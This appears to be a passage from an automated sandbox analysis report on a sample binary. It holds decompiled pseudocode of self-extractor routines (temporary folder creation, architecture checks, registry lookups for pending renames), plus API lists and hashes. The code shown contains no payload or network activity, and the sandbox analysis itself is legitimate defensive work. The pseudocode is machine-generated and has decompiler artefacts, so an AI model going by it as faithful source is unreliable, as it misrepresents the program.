                                                                                                                                                                                                        								_push(_v580);
                                                                                                                                                                                                        								E001F171E(_t80, _t83,  &_v576, _t67);
                                                                                                                                                                                                        								L23:
                                                                                                                                                                                                        								MessageBeep(_a12);
                                                                                                                                                                                                        								if(E001F681F(_t67) == 0) {
                                                                                                                                                                                                        									L25:
                                                                                                                                                                                                        									_t49 = 0x10000;
                                                                                                                                                                                                        								} else {
                                                                                                                                                                                                        									_t54 = E001F67C9(_t74, _t74);
                                                                                                                                                                                                        									_t49 = 0x190000;
                                                                                                                                                                                                        									if(_t54 == 0) {
                                                                                                                                                                                                        										goto L25;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        								_t52 = MessageBoxA(_v584, _t80, "cent", _t49 | _a12 | _a16); // executed
                                                                                                                                                                                                        								_t83 = _t52;
                                                                                                                                                                                                        								LocalFree(_t80);
                                                                                                                                                                                                        								_t39 = _t52;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						if(E001F681F(_t67) == 0) {
                                                                                                                                                                                                        							L4:
                                                                                                                                                                                                        							_t64 = 0x10010;
                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                        							_t66 = E001F67C9(0, 0);
                                                                                                                                                                                                        							_t64 = 0x190010;
                                                                                                                                                                                                        							if(_t66 == 0) {
                                                                                                                                                                                                        								goto L4;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t44 = MessageBoxA(_v584,  &_v64, "cent", _t64);
                                                                                                                                                                                                        						L6:
                                                                                                                                                                                                        						_t39 = _t44 | 0xffffffff;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return E001F6CE0(_t39, _t67, _v8 ^ _t89, _t75, _t80, _t83);
                                                                                                                                                                                                        			}



































                                                                                                                                                                                                        0x001f45d2
                                                                                                                                                                                                        0x001f45d4
                                                                                                                                                                                                        0x001f45d5
                                                                                                                                                                                                        0x001f45db
                                                                                                                                                                                                        0x001f45de
                                                                                                                                                                                                        0x001f45e3
                                                                                                                                                                                                        0x001f45e9
                                                                                                                                                                                                        0x001f45ed
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f45f3
                                                                                                                                                                                                        0x001f45fd
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f4602
                                                                                                                                                                                                        0x001f45ed
                                                                                                                                                                                                        0x001f457e
                                                                                                                                                                                                        0x001f457e
                                                                                                                                                                                                        0x001f4580
                                                                                                                                                                                                        0x001f4580
                                                                                                                                                                                                        0x001f4583
                                                                                                                                                                                                        0x001f4583
                                                                                                                                                                                                        0x001f4585
                                                                                                                                                                                                        0x001f4586
                                                                                                                                                                                                        0x001f458a
                                                                                                                                                                                                        0x001f458c
                                                                                                                                                                                                        0x001f458f
                                                                                                                                                                                                        0x001f458f
                                                                                                                                                                                                        0x001f4591
                                                                                                                                                                                                        0x001f4592
                                                                                                                                                                                                        0x001f459b
                                                                                                                                                                                                        0x001f459e
                                                                                                                                                                                                        0x001f45a3
                                                                                                                                                                                                        0x001f45a9
                                                                                                                                                                                                        0x001f45ad
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f45af
                                                                                                                                                                                                        0x001f45af
                                                                                                                                                                                                        0x001f45bf
                                                                                                                                                                                                        0x001f462d
                                                                                                                                                                                                        0x001f4630
                                                                                                                                                                                                        0x001f463d
                                                                                                                                                                                                        0x001f464e
                                                                                                                                                                                                        0x001f464e
                                                                                                                                                                                                        0x001f463f
                                                                                                                                                                                                        0x001f4640
                                                                                                                                                                                                        0x001f4647
                                                                                                                                                                                                        0x001f464c
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f464c
                                                                                                                                                                                                        0x001f4666
                                                                                                                                                                                                        0x001f466d
                                                                                                                                                                                                        0x001f466f
                                                                                                                                                                                                        0x001f4675
                                                                                                                                                                                                        0x001f4675
                                                                                                                                                                                                        0x001f45ad
                                                                                                                                                                                                        0x001f4527
                                                                                                                                                                                                        0x001f452e
                                                                                                                                                                                                        0x001f453f
                                                                                                                                                                                                        0x001f453f
                                                                                                                                                                                                        0x001f4530
                                                                                                                                                                                                        0x001f4531
                                                                                                                                                                                                        0x001f4538
                                                                                                                                                                                                        0x001f453d
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f453d
                                                                                                                                                                                                        0x001f4554
                                                                                                                                                                                                        0x001f455a
                                                                                                                                                                                                        0x001f455a
                                                                                                                                                                                                        0x001f455a
                                                                                                                                                                                                        0x001f4525
                                                                                                                                                                                                        0x001f468c

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 001F4518
                                                                                                                                                                                                        • MessageBoxA.USER32(?,?,cent,00010010), ref: 001F4554
                                                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,00000065), ref: 001F45A3
                                                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,00000065), ref: 001F45E3
                                                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,00000002), ref: 001F460D
                                                                                                                                                                                                        • MessageBeep.USER32(00000000), ref: 001F4630
                                                                                                                                                                                                        • MessageBoxA.USER32(?,00000000,cent,00000000), ref: 001F4666
                                                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 001F466F
                                                                                                                                                                                                          • Part of subcall function 001F681F: GetVersionExA.KERNEL32(?,00000000,00000002), ref: 001F686E
                                                                                                                                                                                                          • Part of subcall function 001F681F: GetSystemMetrics.USER32(0000004A), ref: 001F68A7
                                                                                                                                                                                                          • Part of subcall function 001F681F: RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 001F68CC
                                                                                                                                                                                                          • Part of subcall function 001F681F: RegQueryValueExA.ADVAPI32(?,001F1140,00000000,?,?,0000000C), ref: 001F68F4
                                                                                                                                                                                                          • Part of subcall function 001F681F: RegCloseKey.ADVAPI32(?), ref: 001F6902
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000002.00000002.416726186.00000000001F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001F0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000002.00000002.416711728.00000000001F0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.416738659.00000000001F8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.416749520.00000000001FA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.416749520.00000000001FC000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_1f0000_stL82bL52.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Local$AllocMessage$BeepCloseFreeLoadMetricsOpenQueryStringSystemValueVersion
                                                                                                                                                                                                        • String ID: LoadString() Error. Could not load string resource.$cent
                                                                                                                                                                                                        • API String ID: 3244514340-2605220145
                                                                                                                                                                                                        • Opcode ID: aba231cb981afcd34225b7291afa5cd34357a6425793fd6a476eed4f57c56175
                                                                                                                                                                                                        • Instruction ID: 161fb68f0c408c7d8dc63c6fdd95f29fb8a4f4247229577395497e5f2a1d69df
                                                                                                                                                                                                        • Opcode Fuzzy Hash: aba231cb981afcd34225b7291afa5cd34357a6425793fd6a476eed4f57c56175
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2B51F4B290021DAFDB21AF28CC48BBB7B69EF85310F054194FE49A7251DB35DE45CBA0
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        C-Code - Quality: 95%
                                                                                                                                                                                                        			E001F53A1(CHAR* __ecx, CHAR* __edx) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				char _v268;
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				signed int _t5;
                                                                                                                                                                                                        				long _t13;
                                                                                                                                                                                                        				int _t14;
                                                                                                                                                                                                        				CHAR* _t20;
                                                                                                                                                                                                        				int _t29;
                                                                                                                                                                                                        				int _t30;
                                                                                                                                                                                                        				CHAR* _t32;
                                                                                                                                                                                                        				signed int _t33;
                                                                                                                                                                                                        				void* _t34;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t5 =  *0x1f8004; // 0xfcdc6e1a
                                                                                                                                                                                                        				_v8 = _t5 ^ _t33;
                                                                                                                                                                                                        				_t32 = __edx;
                                                                                                                                                                                                        				_t20 = __ecx;
                                                                                                                                                                                                        				_t29 = 0;
                                                                                                                                                                                                        				while(1) {
                                                                                                                                                                                                        					E001F171E( &_v268, 0x104, "IXP%03d.TMP", _t29);
                                                                                                                                                                                                        					_t34 = _t34 + 0x10;
                                                                                                                                                                                                        					_t29 = _t29 + 1;
                                                                                                                                                                                                        					E001F1680(_t32, 0x104, _t20);
                                                                                                                                                                                                        					E001F658A(_t32, 0x104,  &_v268); // executed
                                                                                                                                                                                                        					RemoveDirectoryA(_t32); // executed
                                                                                                                                                                                                        					_t13 = GetFileAttributesA(_t32); // executed
                                                                                                                                                                                                        					if(_t13 == 0xffffffff) {
                                                                                                                                                                                                        						break;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					if(_t29 < 0x190) {
                                                                                                                                                                                                        						continue;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					L3:
                                                                                                                                                                                                        					_t30 = 0;
                                                                                                                                                                                                        					if(GetTempFileNameA(_t20, "IXP", 0, _t32) != 0) {
                                                                                                                                                                                                        						_t30 = 1;
                                                                                                                                                                                                        						DeleteFileA(_t32);
                                                                                                                                                                                                        						CreateDirectoryA(_t32, 0);
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					L5:
                                                                                                                                                                                                        					return E001F6CE0(_t30, _t20, _v8 ^ _t33, 0x104, _t30, _t32);
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t14 = CreateDirectoryA(_t32, 0); // executed
                                                                                                                                                                                                        				if(_t14 == 0) {
                                                                                                                                                                                                        					goto L3;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t30 = 1;
                                                                                                                                                                                                        				 *0x1f8a20 = 1;
                                                                                                                                                                                                        				goto L5;
                                                                                                                                                                                                        			}

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                          • Part of subcall function 001F171E: _vsnprintf.MSVCRT ref: 001F1750
                                                                                                                                                                                                        • RemoveDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 001F53FB
                                                                                                                                                                                                        • GetFileAttributesA.KERNELBASE(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 001F5402
                                                                                                                                                                                                        • GetTempFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP002.TMP\,IXP,00000000,?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 001F541F
                                                                                                                                                                                                        • DeleteFileA.KERNEL32(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 001F542B
                                                                                                                                                                                                        • CreateDirectoryA.KERNEL32(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 001F5434
                                                                                                                                                                                                        • CreateDirectoryA.KERNELBASE(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 001F5452
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000002.00000002.416726186.00000000001F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001F0000, based on PE: true
• Associated: 00000002.00000002.416711728.00000000001F0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.416738659.00000000001F8000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.416749520.00000000001FA000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.416749520.00000000001FC000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_1f0000_stL82bL52.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: DirectoryFile$Create$AttributesDeleteNameRemoveTemp_vsnprintf
                                                                                                                                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\IXP002.TMP\$IXP$IXP%03d.TMP
                                                                                                                                                                                                        • API String ID: 1082909758-7194216
                                                                                                                                                                                                        • Opcode ID: a82fe64cc9da819c559c8f87838b5df1d464b718900b6272e469528e8ec99ee0
                                                                                                                                                                                                        • Instruction ID: 83e1796447c258cf4f85f96c13c419568b69c3480777d7561ecff5d5439d2c32
                                                                                                                                                                                                        • Opcode Fuzzy Hash: a82fe64cc9da819c559c8f87838b5df1d464b718900b6272e469528e8ec99ee0
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 851127B130050877D3209B36AC49FBF3A6EEFD1321F400125F74AD2590DF788982C6A1
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 522 1f5467-1f5484 523 1f551c-1f5528 call 1f1680 522->523 524 1f548a-1f5490 call 1f53a1 522->524 528 1f552d-1f5539 call 1f58c8 523->528 527 1f5495-1f5497 524->527 529 1f549d-1f54c0 call 1f1781 527->529 530 1f5581-1f5583 527->530 537 1f554d-1f5552 528->537 538 1f553b-1f5545 CreateDirectoryA 528->538 539 1f550c-1f551a call 1f658a 529->539 540 1f54c2-1f54d8 GetSystemInfo 529->540 533 1f558d-1f559d call 1f6ce0 530->533 544 1f5585-1f558b 537->544 545 1f5554-1f5557 call 1f597d 537->545 542 1f5577-1f557c call 1f6285 538->542 543 1f5547 538->543 539->528 548 1f54fe 540->548 549 1f54da-1f54dd 540->549 542->530 543->537 544->533 551 1f555c-1f555e 545->551 552 1f5503-1f5507 call 1f658a 548->552 555 1f54df-1f54e2 549->555 556 1f54f7-1f54fc 549->556 551->544 557 1f5560-1f5566 551->557 552->539 559 1f54e4-1f54e7 555->559 560 1f54f0-1f54f5 555->560 556->552 557->530 561 1f5568-1f5575 RemoveDirectoryA 557->561 559->539 562 1f54e9-1f54ee 559->562 560->552 561->530 562->552
                                                                                                                                                                                                        C-Code - Quality: 75%
                                                                                                                                                                                                        			E001F5467(CHAR* __ecx, void* __edx, char* _a4) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				char _v268;
                                                                                                                                                                                                        				struct _SYSTEM_INFO _v304;
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				signed int _t10;
                                                                                                                                                                                                        				void* _t13;
                                                                                                                                                                                                        				intOrPtr _t14;
                                                                                                                                                                                                        				void* _t16;
                                                                                                                                                                                                        				void* _t20;
                                                                                                                                                                                                        				signed int _t26;
                                                                                                                                                                                                        				void* _t28;
                                                                                                                                                                                                        				void* _t29;
                                                                                                                                                                                                        				CHAR* _t48;
                                                                                                                                                                                                        				signed int _t49;
                                                                                                                                                                                                        				intOrPtr _t61;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t10 =  *0x1f8004; // 0xfcdc6e1a
                                                                                                                                                                                                        				_v8 = _t10 ^ _t49;
                                                                                                                                                                                                        				_push(__ecx);
                                                                                                                                                                                                        				if(__edx == 0) {
                                                                                                                                                                                                        					_t48 = 0x1f91e4;
                                                                                                                                                                                                        					_t42 = 0x104;
                                                                                                                                                                                                        					E001F1680(0x1f91e4, 0x104);
                                                                                                                                                                                                        					L14:
                                                                                                                                                                                                        					_t13 = E001F58C8(_t48); // executed
                                                                                                                                                                                                        					if(_t13 != 0) {
                                                                                                                                                                                                        						L17:
			_t42 = _a4;
			if(_a4 == 0) {
				L23:
				 *0x1f9124 = 0;
				_t14 = 1;
				L24:
				return E001F6CE0(_t14, 0, _v8 ^ _t49, _t42, 1, _t48);
			}
			_t16 = E001F597D(_t48, _t42, 1, 0); // executed
			if(_t16 != 0) {
				goto L23;
			}
			_t61 =  *0x1f8a20; // 0x0
			if(_t61 != 0) {
				 *0x1f8a20 = 0;
				RemoveDirectoryA(_t48);
			}
			L22:
			_t14 = 0;
			goto L24;
		}
		if(CreateDirectoryA(_t48, 0) == 0) {
			 *0x1f9124 = E001F6285();
			goto L22;
		}
		 *0x1f8a20 = 1;
		goto L17;
	}
	_t42 =  &_v268;
	_t20 = E001F53A1(__ecx,  &_v268); // executed
	if(_t20 == 0) {
		goto L22;
	}
	_push(__ecx);
	_t48 = 0x1f91e4;
	E001F1781(0x1f91e4, 0x104, __ecx,  &_v268);
	if(( *0x1f9a34 & 0x00000020) == 0) {
		L12:
		_t42 = 0x104;
		E001F658A(_t48, 0x104, 0x1f1140);
		goto L14;
	}
	GetSystemInfo( &_v304);
	_t26 = _v304.dwOemId & 0x0000ffff;
	if(_t26 == 0) {
		_push("i386");
		L11:
		E001F658A(_t48, 0x104);
		goto L12;
	}
	_t28 = _t26 - 1;
	if(_t28 == 0) {
		_push("mips");
		goto L11;
	}
	_t29 = _t28 - 1;
	if(_t29 == 0) {
		_push("alpha");
		goto L11;
	}
	if(_t29 != 1) {
		goto L12;
	}
	_push("ppc");
	goto L11;
}





















                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • GetSystemInfo.KERNEL32(?,?,?,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 001F54C9
                                                                                                                                                                                                        • CreateDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 001F553D
                                                                                                                                                                                                        • RemoveDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 001F556F
                                                                                                                                                                                                          • Part of subcall function 001F53A1: RemoveDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 001F53FB
                                                                                                                                                                                                          • Part of subcall function 001F53A1: GetFileAttributesA.KERNELBASE(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 001F5402
                                                                                                                                                                                                          • Part of subcall function 001F53A1: GetTempFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP002.TMP\,IXP,00000000,?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 001F541F
                                                                                                                                                                                                          • Part of subcall function 001F53A1: DeleteFileA.KERNEL32(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 001F542B
                                                                                                                                                                                                          • Part of subcall function 001F53A1: CreateDirectoryA.KERNEL32(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 001F5434
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000002.00000002.416726186.00000000001F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001F0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000002.00000002.416711728.00000000001F0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.416738659.00000000001F8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.416749520.00000000001FA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.416749520.00000000001FC000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_1f0000_stL82bL52.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Directory$File$CreateRemove$AttributesDeleteInfoNameSystemTemp
                                                                                                                                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\IXP002.TMP\$alpha$i386$mips$ppc
                                                                                                                                                                                                        • API String ID: 1979080616-3696344869
                                                                                                                                                                                                        • Opcode ID: bd8b7901fa430042df5c623979847ac96d0c3d6e30a025b5ad7eeac83a21414a
                                                                                                                                                                                                        • Instruction ID: 6da8dc18a3d25e237d5ad6d722a5cc851bd1fe4b28a17381bdfb816c3d85f500
                                                                                                                                                                                                        • Opcode Fuzzy Hash: bd8b7901fa430042df5c623979847ac96d0c3d6e30a025b5ad7eeac83a21414a
                                                                                                                                                                                                        • Instruction Fuzzy Hash: FE31F7B1B00A1DABCF14EF399C44A7E779BAF91350B14012ABB06D3960DF70CE42C695
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 563 1f256d-1f257d 564 1f2583-1f2589 563->564 565 1f2622-1f2627 call 1f24e0 563->565 567 1f258b 564->567 568 1f25e8-1f2607 RegOpenKeyExA 564->568 570 1f2629-1f262f 565->570 567->570 571 1f2591-1f2595 567->571 572 1f2609-1f2620 RegQueryInfoKeyA 568->572 573 1f25e3-1f25e6 568->573 571->570 575 1f259b-1f25ba RegOpenKeyExA 571->575 574 1f25d1-1f25dd RegCloseKey 572->574 573->570 574->573 575->573 576 1f25bc-1f25cb RegQueryValueExA 575->576 576->574
                                                                                                                                                                                                        C-Code - Quality: 86%
                                                                                                                                                                                                        			E001F256D(signed int __ecx) {
                                                                                                                                                                                                        				int _v8;
                                                                                                                                                                                                        				void* _v12;
                                                                                                                                                                                                        				signed int _t13;
                                                                                                                                                                                                        				signed int _t19;
                                                                                                                                                                                                        				long _t24;
                                                                                                                                                                                                        				void* _t26;
                                                                                                                                                                                                        				int _t31;
                                                                                                                                                                                                        				void* _t34;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_push(__ecx);
                                                                                                                                                                                                        				_push(__ecx);
                                                                                                                                                                                                        				_t13 = __ecx & 0x0000ffff;
                                                                                                                                                                                                        				_t31 = 0;
                                                                                                                                                                                                        				if(_t13 == 0) {
                                                                                                                                                                                                        					_t31 = E001F24E0(_t26);
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					_t34 = _t13 - 1;
                                                                                                                                                                                                        					if(_t34 == 0) {
                                                                                                                                                                                                        						_v8 = 0;
                                                                                                                                                                                                        						if(RegOpenKeyExA(0x80000002, "System\\CurrentControlSet\\Control\\Session Manager\\FileRenameOperations", 0, 0x20019,  &_v12) != 0) {
                                                                                                                                                                                                        							goto L7;
                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                        							_t19 = RegQueryInfoKeyA(_v12, 0, 0, 0, 0, 0, 0,  &_v8, 0, 0, 0, 0);
                                                                                                                                                                                                        							goto L6;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						L12:
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						if(_t34 > 0 && __ecx <= 3) {
                                                                                                                                                                                                        							_v8 = 0;
                                                                                                                                                                                                        							_t24 = RegOpenKeyExA(0x80000002, "System\\CurrentControlSet\\Control\\Session Manager", 0, 0x20019,  &_v12); // executed
                                                                                                                                                                                                        							if(_t24 == 0) {
                                                                                                                                                                                                        								_t19 = RegQueryValueExA(_v12, "PendingFileRenameOperations", 0, 0, 0,  &_v8); // executed
                                                                                                                                                                                                        								L6:
                                                                                                                                                                                                        								asm("sbb eax, eax");
                                                                                                                                                                                                        								_v8 = _v8 &  !( ~_t19);
                                                                                                                                                                                                        								RegCloseKey(_v12); // executed
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							L7:
                                                                                                                                                                                                        							_t31 = _v8;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return _t31;
                                                                                                                                                                                                        				goto L12;
                                                                                                                                                                                                        			}












                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Control\Session Manager,00000000,00020019,?,00000000,001F4096,001F4096,?,001F1ED3,00000001,00000000,?,?,001F4137,?), ref: 001F25B2
                                                                                                                                                                                                        • RegQueryValueExA.KERNELBASE(?,PendingFileRenameOperations,00000000,00000000,00000000,001F4096,?,001F1ED3,00000001,00000000,?,?,001F4137,?,001F4096), ref: 001F25CB
                                                                                                                                                                                                        • RegCloseKey.KERNELBASE(?,?,001F1ED3,00000001,00000000,?,?,001F4137,?,001F4096), ref: 001F25DD
                                                                                                                                                                                                        • RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Session Manager\FileRenameOperations,00000000,00020019,?,00000000,001F4096,001F4096,?,001F1ED3,00000001,00000000,?,?,001F4137,?), ref: 001F25FF
                                                                                                                                                                                                        • RegQueryInfoKeyA.ADVAPI32(?,00000000,00000000,00000000,00000000,00000000,00000000,001F4096,00000000,00000000,00000000,00000000,?,001F1ED3,00000001,00000000), ref: 001F261A
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        • PendingFileRenameOperations, xrefs: 001F25C3
                                                                                                                                                                                                        • System\CurrentControlSet\Control\Session Manager\FileRenameOperations, xrefs: 001F25F5
                                                                                                                                                                                                        • System\CurrentControlSet\Control\Session Manager, xrefs: 001F25A8
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000002.00000002.416726186.00000000001F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001F0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000002.00000002.416711728.00000000001F0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.416738659.00000000001F8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.416749520.00000000001FA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.416749520.00000000001FC000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_1f0000_stL82bL52.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: OpenQuery$CloseInfoValue
                                                                                                                                                                                                        • String ID: PendingFileRenameOperations$System\CurrentControlSet\Control\Session Manager$System\CurrentControlSet\Control\Session Manager\FileRenameOperations
                                                                                                                                                                                                        • API String ID: 2209512893-559176071
                                                                                                                                                                                                        • Opcode ID: 07c46ac9aa7431f44048e88030656763f37bbdb74779f0c7367f3629ec4e83ad
                                                                                                                                                                                                        • Instruction ID: 9f8303ad7486294dc17f9867048f1e737b848d827c5a12444c03323725ade797
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 07c46ac9aa7431f44048e88030656763f37bbdb74779f0c7367f3629ec4e83ad
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 26118C7594222CBBDF209B929C09DFBBEBCEF027A1F508055FA0CE2050DB345E44E6A1
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Control-flow Graph

